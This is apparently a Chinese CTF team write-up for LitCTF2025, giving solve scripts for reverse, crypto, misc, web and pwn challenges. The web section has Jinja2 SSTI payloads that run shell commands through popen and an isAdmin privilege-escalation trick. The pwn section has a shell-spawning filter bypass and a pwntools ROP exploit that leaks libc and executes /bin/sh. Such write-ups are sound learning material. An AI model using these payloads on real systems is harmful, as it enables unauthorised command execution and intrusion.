霍雅
追求源于热爱,极致源于梦想!
LitCTF2025(公开赛道)fur@ttack战队wp
05/26
一血二血三血全拿到,没学过游戏,没有ak re,失败
Reverse
easy_rc4
rc4多亦或了个0x20 
def rc4_keystream(key: bytes, n: int) -> list[int]:
S = list(range(256))
j = 0
for i in range(256):
j = (j + S[i] + key[i % len(key)]) & 0xFF
S[i], S[j] = S[j], S[i]
i = j = 0
out = []
for _ in range(n):
i = (i + 1) & 0xFF
j = (j + S[i]) & 0xFF
S[i], S[j] = S[j], S[i]
out.append(S[(S[i] + S[j]) & 0xFF])
return out
cipher = []
for x in (
0x4973F431134ECC78,
0x7E35F4C0734F6C4F,
0xEA7A60194D7627CE,
0xF61CDA8142C05D44,
0x13F8FA94D9587264
):
cipher += [(x >> (8 * i)) & 0xFF for i in range(8)]
key = b"FenKey!!"
ks = rc4_keystream(key, len(cipher))
plain = bytes((c ^ k ^ 0x20) for c, k in zip(cipher, ks))
print(plain.decode())FeatureExtraction
初始化了两个数组给v7,分别是unk_480160和unk_480080 
然后往下分析,找到一个类似于加密的函数 
ai说是什么反卷积 
把那两个数据提出来,让ai写脚本
import struct
# 已从二进制 .rdata 段提取的 salt(10 个 32-bit 小端整型)
S = [
0x4C, 0x69, 0x74, 0x43, 0x54,
0x46, 0x32, 0x30, 0x32, 0x35,
]
# 已从二进制 .rdata 段提取的 target(53 个 32-bit 小端整型)
T = [
0x1690, 0x3E58, 0x6FF1, 0x86F0, 0x9D66, 0xAB30, 0xCA71,
0xCF29, 0xE335, 0xE492, 0xF1FD, 0xDE80, 0xD0C8, 0xC235,
0xB9B5, 0xB1CF, 0x9E9F, 0x9E86, 0x96B4, 0xA550, 0xA0D3,
0xA135, 0x99CA, 0xACC0, 0xBE78, 0xC196, 0xBC00, 0xB5C3,
0xB7F0, 0xB465, 0xB673, 0xB71F, 0xBBE2, 0xCB4F, 0xD2AD,
0xDE20, 0xEC94, 0xFC30, 0x0104B8, 0xF6EE, 0xEDC9, 0xE385,
0xD78B, 0xDE19, 0xC94C, 0xAD14, 0x7E88, 0x6BB9, 0x4CC6,
0x3806, 0x2DC9, 0x2398, 0x19E1,
]
# 反卷积求解长度 44 的输入序列 Aassert S[0] != 0 and T[0] % S[0] == 0
A = [0] * 44
for k in range(44):
acc = T[k]
for j in range(1, min(k, len(S)-1) + 1):
acc -= A[k-j] * S[j]
# 保证无符号整除
A[k] = acc // S[0]
# 将每个 32-bit 整数拆为 4 字节小端,拼成最终的 44 字节输入
flag_bytes = b"".join(a.to_bytes(4, "little") for a in A)
print("Raw bytes:", flag_bytes)
# 尝试以 ASCII 打印
try:
print("ASCII 解码:", flag_bytes.decode('ascii', errors='replace'))
except Exception:
pass
手动去掉不可打印字符
LitCTF{1e5a6230-308c-47cf-907c-4bfafdec8296}
easy_tea
这个花指令是人啊,从上午去到下午都没去干净 
受不了了,直接让ai看汇编 
发现只是魔改了模数
根据已经还原的主函数分析
xtea的秘钥是4个dword,然后ida也识别出这两个数组有的位置上的区别,可以判断v15-18是key其他是密文 
def custom_decrypt(v0, v1, key):
delta = 0x114514
sum = (delta * 32) & 0xFFFFFFFF
for _ in range(32):
v1 = (v1 - (((v0 << 4) + key[2]) ^ (v0 + sum) ^ ((v0 >> 5) + key[3]))) & 0xFFFFFFFF
v0 = (v0 - (((v1 << 4) + key[0]) ^ (v1 + sum) ^ ((v1 >> 5) + key[1]))) & 0xFFFFFFFF
sum = (sum - delta) & 0xFFFFFFFF
return v0, v1
key = [0x11223344, 0x55667788, 0x99AABBCC, 0xDDEEFF11]
ciphertext = [
0x977457FE, 0xDA3E1880,
0xB8169108, 0x1E95285C,
0x1FE7E6F2, 0x2BC5FC57,
0xB28F0FA8, 0x8E0E0644,
0x68454425, 0xC57740D9
]
plaintext = []
for i in range(0, len(ciphertext), 2):
v0, v1 = ciphertext[i], ciphertext[i + 1]
p0, p1 = custom_decrypt(v0, v1, key)
plaintext.extend([p0, p1])
print("解密后的原文(十六进制表示):")
for i in range(0, len(plaintext), 2):
print(f"{hex(plaintext[i])}, {hex(plaintext[i + 1])}")
byte_data = b''.join(p.to_bytes(4, 'big') for p in plaintext)
print("解密得到的字符串:")
print(byte_data.decode('utf-8'))解出的值端序有点不对,手动dword调整一下段序 
pickle
先用pickletools打印操作码
import pickletools
with open("challenge.pickle", "rb") as f:
data = f.read()
pickletools.dis(data)把这抽象的东西给ai 
encrypted_flag = bytes([
85, 84, 174, 227, 132, 190, 207, 142, 77, 24, 235, 236, 231, 213, 138, 153,
60, 29, 241, 241, 237, 208, 144, 222, 115, 16, 242, 239, 231, 165, 157, 224,
56, 104, 242, 128, 250, 211, 150, 225, 63, 29, 242, 169
])
key_ints = [19, 55, 192, 222, 202, 254, 186, 190]
# 解密得到
Flagdecrypted = bytes([encrypted_flag[i] ^ key_ints[i % len(key_ints)] for i in range(len(encrypted_flag))])
print("Flag:", decrypted.decode())解出的值看似乱码,实际全都是可打印字符 
这玩意我早就解出过了,我一开始也以为是乱码,呜呜呜一血没了
尝试随波逐流一把梭 
Web
星愿信箱
一上来发现啥也没有,然后测试发现是 ssti,有过滤,fenjing 一把梭翻车了,然后手动测。
{% s %}
# 处理愿望时出错:Encountered unknown tag 's'.
{% if 1*2==2 %}k{% endif %}
# k
{% for i in ''.__class__.__mro__[1].__subclasses__() %}{% if i.__name__=='_wrap_close' %}{% print i.__init__.__globals__['popen']('ls').read() %}{% endif %}{% endfor %}
{% for i in ''.__class__.__mro__[1].__subclasses__() %}{% if i.__name__=='_wrap_close' %}{% print i.__init__.__globals__['popen']('nl /*').read() %}{% endif %}{% endfor %}nest_js
搜个常用用户名就和你爆了。
多重宇宙日记
注册账号,然后登录,查看 profile 的 html 注释,有 js 代码。
在测试区域输入,将 isAdmin 置 1,进管理员面板得到 flag。
# {"isAdmin": true}
{"settings": {"isAdmin": true}}
Crypto
basic
ez_math
- 计算特征值、辨别式。
- 求解特征值。
- 计算指数逆元。
- 特征值求根。
- 重构对角矩阵。
- 生成候选矩阵。
##from sage.all import *
##from Crypto.Util.number import *
##from uuid import uuid4
##
##flag = b'LitCTF{'+ str(uuid4()).encode() + b'}'
##flag = bytes_to_long(flag)
##len_flag = flag.bit_length()
##e = 65537
##p = getPrime(512)
##P = GF(p)
##A = [[flag, getPrime(len_flag)],
## [getPrime(len_flag), getPrime(len_flag)]]
##A = matrix(P, A)
##B = A ** e
##
##print(f"e = {e}")
##print(f"p = {p}")
##print(f"B = {list(B)}".replace('(', '[').replace(')', ']'))
##e = 65537
##p = 8147594556101158967571180945694180896742294483544853070485096002084187305007965554901340220135102394516080775084644243545680089670612459698730714507241869
##B = [[2155477851953408309667286450183162647077775173298899672730310990871751073331268840697064969968224381692698267285466913831393859280698670494293432275120170, 4113196339199671283644050914377933292797783829068402678379946926727565560805246629977929420627263995348168282358929186302526949449679561299204123214741547], [3652128051559825585352835887172797117251184204957364197630337114276860638429451378581133662832585442502338145987792778148110514594776496633267082169998598, 2475627430652911131017666156879485088601207383028954405788583206976605890994185119936790889665919339591067412273564551745588770370229650653217822472440992]]
##
from sage.all import *
pub_exp = 65537
mod_prime = 8147594556101158967571180945694180896742294483544853070485096002084187305007965554901340220135102394516080775084644243545680089670612459698730714507241869
matrix_B = matrix(GF(mod_prime), [[2155477851953408309667286450183162647077775173298899672730310990871751073331268840697064969968224381692698267285466913831393859280698670494293432275120170, 4113196339199671283644050914377933292797783829068402678379946926727565560805246629977929420627263995348168282358929186302526949449679561299204123214741547], [3652128051559825585352835887172797117251184204957364197630337114276860638429451378581133662832585442502338145987792778148110514594776496633267082169998598, 2475627430652911131017666156879485088601207383028954405788583206976605890994185119936790889665919339591067412273564551745588770370229650653217822472440992]])
# 计算特征值、判别式
trace_matrix = matrix_B.trace()
determinant_B = matrix_B.determinant()
discriminant = trace_matrix**2 - 4 * determinant_B
if not is_square(discriminant):
print("判别式非二次剩余,无法对角化")
else:
sqrt_discriminant = sqrt(discriminant)
eigenval1 = (trace_matrix + sqrt_discriminant) // 2
eigenval2 = (trace_matrix - sqrt_discriminant) // 2
# 计算 pub_exp 的模逆元
priv_exp = inverse_mod(pub_exp, mod_prime-1)
# 计算特征值的 pub_exp 次根
root1 = pow(eigenval1, priv_exp, mod_prime)
root2 = pow(eigenval2, priv_exp, mod_prime)
# 构造对角矩阵并尝试两种排列
diag_orders = [ (root1, root2), (root2, root1) ]
for order_idx, (diag_val1, diag_val2) in enumerate(diag_orders):
diag_prime = diagonal_matrix(GF(mod_prime), [diag_val1, diag_val2])
try:
eigen_data = matrix_B.eigenmatrix_right()
eigenvec_matrix = eigen_data[1]
if eigenvec_matrix.determinant() == 0:
print(f"排列{order_idx}: 特征向量矩阵不可逆")
continue
# 计算原始矩阵
matrix_A = eigenvec_matrix * diag_prime * eigenvec_matrix.inverse()
flag_integer = int(matrix_A[0, 0])
flag_bytes = flag_integer.to_bytes((flag_integer.bit_length()+7)//8, 'big')
if b'LitCTF{' in flag_bytes:
print(f"排列{order_idx} Flag: {flag_bytes.decode()}")
break
else:
print(f"排列{order_idx} 候选: {flag_bytes.hex()}")
except Exception as err:
print(f"排列{order_idx} 错误: {err}")
math
- 分析 hint 结构。
- 分解 delta 提取 noise。
- 计算 p+q。
- 解二次方程分解 n。
- RSA 解密。
##from Crypto.Util.number import *
##from enc import flag
##
##m = bytes_to_long(flag)
##e = 65537
##p,q = getPrime(1024),getPrime(1024)
##n = p*q
##noise = getPrime(40)
##tmp1 = noise*p+noise*q
##tmp2 = noise*noise
##hint = p*q+tmp1+tmp2
##c = pow(m,e,n)
##print(f"n = {n}")
##print(f"e = {e}")
##print(f"c = {c}")
##print(f"hint = {hint}")
from sage.all import *
import sys
n = 17532490684844499573962335739488728447047570856216948961588440767955512955473651897333925229174151614695264324340730480776786566348862857891246670588649327068340567882240999607182345833441113636475093894425780004013793034622954182148283517822177334733794951622433597634369648913113258689335969565066224724927142875488372745811265526082952677738164529563954987228906850399133238995317510054164641775620492640261304545177255239344267408541100183257566363663184114386155791750269054370153318333985294770328952530538998873255288249682710758780563400912097941615526239960620378046855974566511497666396320752739097426013141
e = 65537
c = 1443781085228809103260687286964643829663045712724558803386592638665188285978095387180863161962724216167963654290035919557593637853286347618612161170407578261345832596144085802169614820425769327958192208423842665197938979924635782828703591528369967294598450115818251812197323674041438116930949452107918727347915177319686431081596379288639254670818653338903424232605790442382455868513646425376462921686391652158186913416425784854067607352211587156772930311563002832095834548323381414409747899386887578746299577314595641345032692386684834362470575165392266454078129135668153486829723593489194729482511596288603515252196
hint = 17532490684844499573962335739488728447047570856216948961588440767955512955473651897333925229174151614695264324340730480776786566348862857891246670588649327068340567882240999607182345833441113636475093894425780004013793034622954182148283517822177334733794951622433597634369648913113258689335969565315879035806034866363781260326863226820493638303543900551786806420978685834963920605455531498816171226961859405498825422799670404315599803610007692517859020686506546933013150302023167306580068646104886750772590407299332549746317286972954245335810093049085813683948329319499796034424103981702702886662008367017860043529164
delta = hint - n
# Pollard's Rho算法寻找因子
def find_factor_rho(target):
if target == 1:
return target
if target % 2 == 0:
return 2
if target % 3 == 0:
return 3
from random import randint
while True:
rand_c = randint(1, target-1)
func = lambda x: (pow(x, 2, target) + rand_c) % target
a, b, divisor = 2, 2, 1
while divisor == 1:
a = func(a)
b = func(func(b))
divisor = gcd(a - b, target)
if divisor != target:
return divisor
# 递归寻找 40 位素数因子
def retrieve_small_prime(remaining):
candidate = find_factor_rho(remaining)
if candidate.bit_length() == 40 and is_prime(candidate):
return candidate
return retrieve_small_prime(remaining // candidate)
small_prime_factor = retrieve_small_prime(delta)
print(f"找到小素数因子: {small_prime_factor} (位数: {small_prime_factor.bit_length()})")
# 计算 p+q 的和
sum_pq = (delta // small_prime_factor) - small_prime_factor
# 解二次方程 x² - sum_pq*x + n = 0
discriminant = sum_pq**2 - 4*n
sqrt_discriminant = int(sqrt(discriminant))
if sqrt_discriminant**2 != discriminant:
raise ValueError("判别式非完全平方")
prime_p = (sum_pq + sqrt_discriminant) // 2
prime_q = (sum_pq - sqrt_discriminant) // 2
# 验证分解结果
assert prime_p * prime_q == n, "分解失败"
# RSA解密
phi_n = (prime_p-1)*(prime_q-1)
private_key = inverse_mod(e, phi_n)
plaintext_message = pow(c, private_key, n)
# 输出flag
from Crypto.Util.number import long_to_bytes
print("Flag:", long_to_bytes(int(plaintext_message)).decode())PS C:\Users\kaqi> wsl -d Arch
[root@yinglongServer kaqi]# sage
leak
- 建立多项式方程。
- Coppersmith 方法求解小根。
- 计算素数 p。
- 解密 RSA。
##from Crypto.Util.number import *
##from enc import flag
##
##m = bytes_to_long(flag)
##p,q,e = getPrime(1024),getPrime(1024),getPrime(101)
##n = p*q
##temp = gmpy2.invert(e,p-1)
##c = pow(m,e,n)
##hint = temp>>180
##print(f"e = {e}")
##print(f"n = {n}")
##print(f"c = {c}")
##print(f"hint = {hint}")
##'''
##e = 1915595112993511209389477484497
##n = 12058282950596489853905564906853910576358068658769384729579819801721022283769030646360180235232443948894906791062870193314816321865741998147649422414431603039299616924238070704766273248012723702232534461910351418959616424998310622248291946154911467931964165973880496792299684212854214808779137819098357856373383337861864983040851365040402759759347175336660743115085194245075677724908400670513472707204162448675189436121439485901172477676082718531655089758822272217352755724670977397896215535981617949681898003148122723643223872440304852939317937912373577272644460885574430666002498233608150431820264832747326321450951
##c = 5408361909232088411927098437148101161537011991636129516591281515719880372902772811801912955227544956928232819204513431590526561344301881618680646725398384396780493500649993257687034790300731922993696656726802653808160527651979428360536351980573727547243033796256983447267916371027899350378727589926205722216229710593828255704443872984334145124355391164297338618851078271620401852146006797653957299047860900048265940437555113706268887718422744645438627302494160620008862694047022773311552492738928266138774813855752781598514642890074854185464896060598268009621985230517465300289580941739719020511078726263797913582399
##hint = 10818795142327948869191775315599184514916408553660572070587057895748317442312635789407391509205135808872509326739583930473478654752295542349813847128992385262182771143444612586369461112374487380427668276692719788567075889405245844775441364204657098142930
##'''
import itertools
def find_min_roots(poly_eq, limits, param_m=1, param_d=None):
if not param_d:
param_d = poly_eq.degree()
base_ring = poly_eq.base_ring()
modulus = base_ring.cardinality()
poly_eq = poly_eq / poly_eq.coefficients().pop(0)
poly_eq = poly_eq.change_ring(ZZ)
seq_G = Sequence([], poly_eq.parent())
for idx in range(param_m + 1):
base_val = modulus^(param_m - idx) * poly_eq^idx
for exponents in itertools.product(range(param_d), repeat=poly_eq.nvariables()):
poly_term = base_val * prod(map(power, poly_eq.variables(), exponents))
seq_G.append(poly_term)
matrix_B, monomial_list = seq_G.coefficient_matrix()
monomial_vec = vector(monomial_list)
scaling_factors = [monom(*limits) for monom in monomial_vec]
for col, factor in enumerate(scaling_factors):
matrix_B.rescale_col(col, factor)
matrix_B = matrix_B.dense_matrix().LLL()
matrix_B = matrix_B.change_ring(QQ)
for col, factor in enumerate(scaling_factors):
matrix_B.rescale_col(col, 1 / factor)
seq_H = Sequence([], poly_eq.parent().change_ring(QQ))
for h_poly in filter(None, matrix_B * monomial_vec):
seq_H.append(h_poly)
ideal_I = seq_H.ideal()
if ideal_I.dimension() == -1:
seq_H.pop()
elif ideal_I.dimension() == 0:
roots_found = []
for sol in ideal_I.variety(ring=ZZ):
sol_tuple = tuple(base_ring(sol[var]) for var in poly_eq.variables())
roots_found.append(sol_tuple)
return roots_found
return []
# 题目参数
pub_exp = 1915595112993511209389477484497
modulus_n = 12058282950596489853905564906853910576358068658769384729579819801721022283769030646360180235232443948894906791062870193314816321865741998147649422414431603039299616924238070704766273248012723702232534461910351418959616424998310622248291946154911467931964165973880496792299684212854214808779137819098357856373383337861864983040851365040402759759347175336660743115085194245075677724908400670513472707204162448675189436121439485901172477676082718531655089758822272217352755724670977397896215535981617949681898003148122723643223872440304852939317937912373577272644460885574430666002498233608150431820264832747326321450951
ciphertext_c = 5408361909232088411927098437148101161537011991636129516591281515719880372902772811801912955227544956928232819204513431590526561344301881618680646725398384396780493500649993257687034790300731922993696656726802653808160527651979428360536351980573727547243033796256983447267916371027899350378727589926205722216229710593828255704443872984334145124355391164297338618851078271620401852146006797653957299047860900048265940437555113706268887718422744645438627302494160620008862694047022773311552492738928266138774813855752781598514642890074854185464896060598268009621985230517465300289580941739719020511078726263797913582399
hint_val = 10818795142327948869191775315599184514916408553660572070587057895748317442312635789407391509205135808872509326739583930473478654752295542349813847128992385262182771143444612586369461112374487380427668276692719788567075889405245844775441364204657098142930
# 定义多项式环
poly_ring.<delta, key> = PolynomialRing(Zmod(modulus_n))
# 构造目标多项式
poly_eq = pub_exp*(hint_val*2^180 + delta) + key - 1
# 求解小根
delta_h, key_val = find_min_roots(poly_eq, [2^180, 2^100], param_m=1, param_d=3)[0]
# 计算素数p
temp_p_part = hint_val*2^180 + delta_h
prime_p = gcd(modulus_n, (pub_exp*temp_p_part - 1)//key_val + 1)
print("[+] 素数 p =", prime_p)
# 计算私钥
private_d = pow(pub_exp, -1, prime_p - 1)
# 解密获得明文
plaintext_m = pow(ciphertext_c, private_d, prime_p)
# 转换字节
flag_bytes = int(plaintext_m).to_bytes((int(plaintext_m).bit_length() +7 ) //8, 'big')
print("[+] Flag:", flag_bytes.decode())
Misc
灵感菇
https://github.com/ProbiusOfficial/Lingicrypt
[kaqi C:\Users\kaqi\Downloads\Lingicrypt-main] python main.py -f 1.txt -d
处理结果:
NSSCTF{6e10bd90-cd9c-4264-8c3e-0bc662070f09}Cropping
- 一把梭解伪加密。
- 然后解压拿文件。
- 整个 python 脚本把二维码图片拼一下。
from PIL import Image
import os
# 配置参数
TILES_COUNT_X = 10 # 列数(X轴)
TILES_COUNT_Y = 10 # 行数(Y轴)
TILE_WIDTH = 256 # 每张 tile 图片的宽度
TILE_HEIGHT = 256 # 每张 tile 图片的高度
# 创建一个空白的大图
result_image = Image.new('RGB', (TILES_COUNT_X * TILE_WIDTH, TILES_COUNT_Y * TILE_HEIGHT))
# 加载每张图片并粘贴到对应位置
for y in range(TILES_COUNT_Y):
for x in range(TILES_COUNT_X):
p1 = r'C:\Users\kaqi\Downloads\1\flag\tiles'
p2 = f"tile_{y}_{x}.png"
filename = p1 + '\\' + p2
# print(filename)
if not os.path.exists(filename):
raise FileNotFoundError(f"找不到文件: {filename}")
img = Image.open(filename)
# 可选:确保尺寸一致
if img.size != (TILE_WIDTH, TILE_HEIGHT):
img = img.resize((TILE_WIDTH, TILE_HEIGHT))
position = (x * TILE_WIDTH, y * TILE_HEIGHT)
result_image.paste(img, position)
# 保存结果
result_image.save("final_map.png")
print("拼接完成,已保存为 final_map.png")
LitCTF{e7c3f4b2-9a6f-4d3f-9f98-0b3db91c2a12}
消失的文字
- 流量一把梭,得到密码。
- 网站一把梭。
Pwn
test_your_nc
过滤了传入字符串 “cat" "ls" " " ..... 可以使用变量赋值进行拼接绕过执行sh就可以直接获取shell
a=s;b=h;$a$bmaster_of_rop
栈迁移 add magic gadget打ogg
from pwn import *
context(arch='amd64',log_level='debug')
file = './pwn'
io = process(file)
# io = remote('node8.anna.nssctf.cn',23410)
elf = ELF(file)
libc = elf.libc
# gdb.attach(io)
s = lambda data :io.send(data)
sa = lambda text,data :io.sendafter(text, data)
sl = lambda data :io.sendline(data)
sla = lambda text,data :io.sendlineafter(text, data)
r = lambda num=4096 :io.recv(num)
rl = lambda :io.recvline()
ru = lambda text :io.recvuntil(text)
uu32 = lambda :u32(io.recvuntil(b"\xf7")[-4:].ljust(4,b"\x00"))
uu64 = lambda :u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
inf = lambda s :info(f"{s} ==> 0x{eval(s):x}")
magic = 0x000000000040115c #add dword ptr [rbp - 0x3d], ebx ; nop ; ret
gets_ = 0x4011C8
bss = 0x404100
puts_ = 0x4011C0
leave = 0x4011DE
rbp = 0x4011AB
gadget = 0x4010d0
# gdb.attach(io,f'b *{gadget}')
pay = b'a'*0x20+p64(bss+0x520)+p64(gadget)+p64(puts_)
sla(b'elcome to LitCTF2025!\n',pay)
_stdout_ = u64(rl()[-7:-1].ljust(8,b'\x00'))
inf('_stdout_')
libc.address = _stdout_-libc.sym['_IO_2_1_stdout_']
inf('libc.address')
rdi = libc.address+0x000000000010f75b
ret = 0x0000000000112435+libc.address
rax = 0x00000000000dd237+libc.address
rsi_r1 = 0x000000000010f759+libc.address
syscall = 0x0000000000098fb6+libc.address
pay = b'a'*0x20+p64(bss+0x500)+p64(rdi)+p64(next(libc.search(b'/bin/sh\x00')))+p64(rax)+p64(0x3b)+p64(rsi_r1)+p64(0)*2+p64(syscall)
sl(pay)
io.interactive()